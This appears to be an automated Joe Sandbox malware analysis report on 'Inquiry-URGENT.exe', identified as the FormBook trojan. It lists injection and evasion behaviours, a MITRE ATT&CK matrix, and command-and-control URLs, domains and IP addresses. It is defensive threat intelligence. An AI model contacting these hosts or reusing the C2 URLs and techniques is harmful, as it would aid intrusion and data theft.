          Source: Yara matchFile source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491567 Sample: Inquiry-URGENT.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 31 www.studyengland.com 2->31 33 www.novasaude-g1.online 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 10 other signatures 2->47 11 Inquiry-URGENT.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\Inquiry-URGENT.exe.log, ASCII 11->29 dropped 61 Tries to detect virtualization through RDTSC time measurements 11->61 63 Injects a PE file into a foreign processes 11->63 15 Inquiry-URGENT.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.lianshangtron.com 18->35 37 www.trasportesemmanuel.com 162.241.61.210, 49845, 80 UNIFIEDLAYER-AS-1US United States 18->37 39 15 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Performs DNS queries to domains with low reputation 18->51 22 rundll32.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Inquiry-URGENT.exe36%VirustotalBrowse
          Inquiry-URGENT.exe23%MetadefenderBrowse
          Inquiry-URGENT.exe71%ReversingLabsWin32.Trojan.FormBook

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.Inquiry-URGENT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          tameka-stewart.com1%VirustotalBrowse
          tovardarom.xyz1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)0%Avira URL Cloudsafe
          http://findquickresultsnow.com/fashion_trends.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ4p0%Avira URL Cloudsafe
          http://findquickresultsnow.com/song_lyrics.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ4pPrs0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf0%Avira URL Cloudsafe
          http://www.khlopok.club/b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&DJE8X=4hlh30%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf0%Avira URL Cloudsafe
          http://findquickresultsnow.com/Top_Smart_Phones.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix0%Avira URL Cloudsafe
          http://www.lianshangtron.com/b5ce/?7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&DJE8X=4hlh30%Avira URL Cloudsafe
          www.rheilea.com/b5ce/0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf0%Avira URL Cloudsafe
          http://findquickresultsnow.com/display.cfm0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff20%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/libgh.png)0%Avira URL Cloudsafe
          http://www.tovardarom.xyz/b5ce/?7nqLWRV0=DJnvNV/6mp+JehKrIaw09sUOMJEcD/JystEz9B9fnmezvaywTqAFSPdXHnxiLUzhPCdJ&DJE8X=4hlh30%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff20%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/arrow.png)0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/bodybg.png)0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/logo.png)0%Avira URL Cloudsafe
          http://findquickresultsnow.com/Best_Mortgage_Rates.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO10%Avira URL Cloudsafe
          http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP+7L8K6Nslrqzy4UJncL0zvFIM5Fri+7k0NXne0nLY&DJE8X=4hlh3100%Avira URL Cloudmalware
          http://findquickresultsnow.com/Free_Credit_Report.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1N0%Avira URL Cloudsafe
          http://findquickresultsnow.com/Migraine_Pain_Relief.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO0%Avira URL Cloudsafe
          https://www.novasaude-g1.online/b5ce/?7nqLWRV0=SAwBm00%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/libg.png)0%Avira URL Cloudsafe
          http://findquickresultsnow.com/Top_10_Luxury_Cars.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1N0%Avira URL Cloudsafe
          http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP100%Avira URL Cloudmalware
          http://www.josiemaran-supernatural.com/b5ce/?7nqLWRV0=/AI3JQDCZyk/6ubsQmnvJO3EeIaIHb6AvonvM2F4xgXAwnTSleK6/XaIEVHpjjtFOEyF&DJE8X=4hlh30%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b0%Avira URL Cloudsafe
          http://www.tameka-stewart.com/b5ce/?7nqLWRV0=4jQHwSxHHIZwFcDn9YyiwFwOuX4cum7XsZ3DkRiOKi2AyYToUWCX9nZ4+Axc57SiIQXe&DJE8X=4hlh30%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.novasaude-g1.online
          		172.67.153.117
          		truefalse
            		unknown
            tameka-stewart.com
            		184.168.131.241
            		truetrueunknown
            tovardarom.xyz
            		213.5.70.60
            		truetrueunknown
            www.nutritionhawks.com
            		74.208.236.139
            		truetrue
              		unknown
              apexpropertiesltd.com
              		34.102.136.180
              		truefalse
                		unknown
                www.trasportesemmanuel.com
                		162.241.61.210
                		truetrue
                  		unknown
                  www.studyengland.com
                  		209.99.64.43
                  		truetrue
                    		unknown
                    www.lianshangtron.com
                    		103.100.209.77
                    		truetrue
                      		unknown
                      josiemaran-supernatural.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        khlopok.club
                        		34.252.217.69
                        		truetrue
                          		unknown
                          www.tameka-stewart.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.khlopok.club
                            		unknown
                            		unknowntrue
                              		unknown
                              www.tovardarom.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.lakeefctmich.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.apexpropertiesltd.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.bajajfinservmutualfund.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.zambiaedu.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.josiemaran-supernatural.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.khlopok.club/b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&DJE8X=4hlh3true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.lianshangtron.com/b5ce/?7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&DJE8X=4hlh3true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          www.rheilea.com/b5ce/true
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.tovardarom.xyz/b5ce/?7nqLWRV0=DJnvNV/6mp+JehKrIaw09sUOMJEcD/JystEz9B9fnmezvaywTqAFSPdXHnxiLUzhPCdJ&DJE8X=4hlh3true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP+7L8K6Nslrqzy4UJncL0zvFIM5Fri+7k0NXne0nLY&DJE8X=4hlh3true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.josiemaran-supernatural.com/b5ce/?7nqLWRV0=/AI3JQDCZyk/6ubsQmnvJO3EeIaIHb6AvonvM2F4xgXAwnTSleK6/XaIEVHpjjtFOEyF&DJE8X=4hlh3false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tameka-stewart.com/b5ce/?7nqLWRV0=4jQHwSxHHIZwFcDn9YyiwFwOuX4cum7XsZ3DkRiOKi2AyYToUWCX9nZ4+Axc57SiIQXe&DJE8X=4hlh3true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://findquickresultsnow.com/fashion_trends.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ4prundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://findquickresultsnow.com/song_lyrics.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ4pPrsrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otfrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otfrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://findquickresultsnow.com/Top_Smart_Phones.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefixrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttfrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttfrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://findquickresultsnow.com/display.cfmrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eotrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/pics/12471/libgh.png)rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefixrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eotrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/pics/12471/arrow.png)rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/pics/12471/bodybg.png)rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/pics/12471/logo.png)rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://findquickresultsnow.com/Best_Mortgage_Rates.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://findquickresultsnow.com/Free_Credit_Report.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1Nrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://findquickresultsnow.com/Migraine_Pain_Relief.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFOrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.novasaude-g1.online/b5ce/?7nqLWRV0=SAwBm0rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/pics/12471/libg.png)rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://findquickresultsnow.com/Top_10_Luxury_Cars.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1Nrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRPrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-brundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woffrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-rrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woffrundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i1.cdn-image.com/__media__/js/min.js?v2.3rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          74.208.236.139
                                          		www.nutritionhawks.comUnited States
                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                          213.5.70.60
                                          		tovardarom.xyzNetherlands
                                          		51430ALTUSNLtrue
                                          34.252.217.69
                                          		khlopok.clubUnited States
                                          		16509AMAZON-02UStrue
                                          103.100.209.77
                                          		www.lianshangtron.comHong Kong
                                          		133115HKKFGL-AS-APHKKwaifongGroupLimitedHKtrue
                                          162.241.61.210
                                          		www.trasportesemmanuel.comUnited States
                                          		46606UNIFIEDLAYER-AS-1UStrue
                                          34.102.136.180
                                          		apexpropertiesltd.comUnited States
                                          		15169GOOGLEUSfalse
                                          184.168.131.241
                                          		tameka-stewart.comUnited States
                                          		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:491567
                                          Start date:27.09.2021
                                          Start time:17:53:02
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 11m 4s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:Inquiry-URGENT.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:18
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/1@13/7
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 14.4% (good quality ratio 12.8%)
                                          • Quality average: 73%
                                          • Quality standard deviation: 32%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.82.210.154, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.49.157.6
                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          17:53:59API Interceptor1x Sleep call for process: Inquiry-URGENT.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          74.208.236.13921PO#578478847.exeGet hashmaliciousBrowse
                                          • www.25307viaoriol.com/tu/
                                          73PO17072018.exeGet hashmaliciousBrowse
                                          • www.25307viaoriol.com/tu/
                                          184.168.131.241ejecutable1.exeGet hashmaliciousBrowse
                                          • www.dunedinhyperlocal.com/u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz
                                          MOQ-Request_0927210-006452.xlsxGet hashmaliciousBrowse
                                          • www.moneybagsinfinity.com/m0np/?MZ=oKyMT3YA8KYt+NxcJRzkJ3DEXUmtwPIijI6mHOJ0EgjLAKv9c/DPBOPUL/8UoSqg7ZX4ig==&fldpz=6lxl4n5XAfXdk
                                          HSBC94302,pdf.exeGet hashmaliciousBrowse
                                          • www.darlindough.com/dhua/?dXj87bfP=NZv036+4e3gN/+qloKFg8Oq5zVOT3D7E82a1gkyvusPwYdrWE8ti2PEEBsAPXfx/A0mh&xXE=6lxdAHgP
                                          DUE PAYMENT.exeGet hashmaliciousBrowse
                                          • www.sunshinefamilysupport.com/b2c0/?2dpPwJP=OHhY/R7Pi7l9OOhmJJK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFJSTx4r5BI+0&uN9=3fPH4rk8fd4xHD
                                          v2XwLpMqG5.exeGet hashmaliciousBrowse
                                          • www.hiphopventuresllc.com/nthe/?N8M=gJEdz6O82R845Lp&2doH=51bJujFJBxpSDR9k7cUDilKkV4KkFhJHHX/lE6+3+eoVRGg/EppnzVI8s0sFuxy6WP910E8BOw==
                                          TNT 07833955.exeGet hashmaliciousBrowse
                                          • www.tameka-stewart.com/b5ce/?2dtd=2dTpyPZX3Tqt_8d0&C2M=4jQHwSxHHIZwFcDn9YyiwFwOuX4cum7XsZ3DkRiOKi2AyYToUWCX9nZ4+DdflLeaFxqIDX9qeg==
                                          invoice.exeGet hashmaliciousBrowse
                                          • www.urbanroosterbrewing.com/etaf/?dL34vp=1bu4HbvxwjIxUH&m6=aHXdck283bAMt2Hfk1As5U9hVPBLyqAthq2CGBgXsktpW+EcgrhDLEVrOOQJB15O3/i7
                                          New Order Specifications.exeGet hashmaliciousBrowse
                                          • www.yourrealtorcoach.com/ssee/?Shy=7nUtX&LB_8RH=pMY6JGS2pnoegGhbaSt9t22BnLNre01dlhVog6ZDEy5KmRh15Wpo2WC1JFMWDW/HRSQb
                                          YVcB6LD4Lj.exeGet hashmaliciousBrowse
                                          • www.jenpaddock.com/cmsr/?-Z=eq8yEKAWGsylHEvex3bMTlVCFSQ96FyCuEeWsdTcJSUtYF5hFZpfpINpvkF7Ck5gCU8U&lRX8A=7n-DOjbx_Tr8
                                          Abn order 55.docGet hashmaliciousBrowse
                                          • www.thefreepersons.com/bckt/?eL0dq=obSpz2dXnPNlX&wl50w=tBZE9MRU2EUCHEwIwv7fcfTWhZCle+3oKy9s20c3Pi8AEnYmP/C5/kAmHQxa8isvtfF0Gg==
                                          Amended SO of 2000KVA400KVA.exeGet hashmaliciousBrowse
                                          • www.theboathub.com/ergs/?4hqpRfZp=LEbmtPDTU+vYT/by0IYIeQazdksm7/S906+FI13/4CRuN5C8KL2uQRgeKJiNZmLH+44R&p84Hff=gDHP36_0
                                          payment..exeGet hashmaliciousBrowse
                                          • www.urbanroosterbrewing.com/etaf/?7n=Pzrtyx08&lHFx40t=aHXdck283bAMt2Hfk1As5U9hVPBLyqAthq2CGBgXsktpW+EcgrhDLEVrOOQJB15O3/i7
                                          Quotation & Sample Designs.PDF.exeGet hashmaliciousBrowse
